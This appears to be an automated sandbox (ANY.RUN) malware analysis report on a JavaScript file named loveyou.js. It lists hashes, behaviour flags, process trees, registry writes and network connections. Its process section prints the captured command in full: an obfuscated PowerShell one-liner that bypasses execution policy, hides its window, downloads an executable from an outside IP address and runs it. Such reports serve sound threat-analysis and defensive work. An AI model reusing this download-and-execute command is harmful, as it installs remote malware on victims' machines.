File name:

loveyou.js

Full analysis: https://app.any.run/tasks/ef9d23ea-fd6c-4040-9aa7-cd44345da9ec
Verdict: Malicious activity
Analysis date: May 15, 2024, 07:43:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (16804)
MD5:

CE58FE36343AFDBE2B2A36F123ECB9A7

SHA1:

CE17790E9C0D1547F25AA3D30E38B5F17EB9FC8A

SHA256:

F3E743C919C1DEAF5108D361C4FF610187606F450FABDA0BEA3786D4063511B1

SSDEEP:

384:pjJMmz2yY3ZgyUj/H2rx2COKCaPFK/zqUdq9kGjzByFBdXcDYgZNuQTe+l3/o/N7:HMB3OyUTHo2ACaPFKrqUdq9kGjzByF/3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4056)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4024)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4056)
  • SUSPICIOUS

    • Reads the Internet Settings

      • wscript.exe (PID: 3976)
      • powershell.exe (PID: 4056)
    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 3976)
    • Probably download files using WebClient

      • cmd.exe (PID: 4024)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 3976)
    • Found IP address in command line

      • powershell.exe (PID: 4056)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 4024)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4024)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 4056)
    • Unusual connection from system programs

      • powershell.exe (PID: 4056)
  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3976"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\loveyou.jsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
4024"C:\Windows\System32\cmd.exe" /c hMLWtlbsdHkTjom & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://92.63.197.190/nnn.exe','%temp%erb19.exe'); & %temp%erb19.exe & OWNHgawUJSfreRDC:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
4056PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://92.63.197.190/nnn.exe','C:\Users\admin\AppData\Local\Temperb19.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
3 273
Read events
3 265
Write events
8
Delete events
0

Modification events

(PID) Process:(3976) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3976) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3976) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3976) wscript.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
0
Suspicious files
4
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
4056powershell.exeC:\Users\admin\AppData\Local\Temp\jp3jisg2.5pj.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
4056powershell.exeC:\Users\admin\AppData\Local\Temp\blplurav.c2p.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
4056powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
4056powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:6675EDE59684F4A119D2E5DA282AFBE6
SHA256:5026C5EE8FA9ACB21718BF1FAD563C0A3FD5BC79327611FDF9C4ABD2647CE829
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4056
powershell.exe
92.63.197.190:80
OOO SibirInvest
RU
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info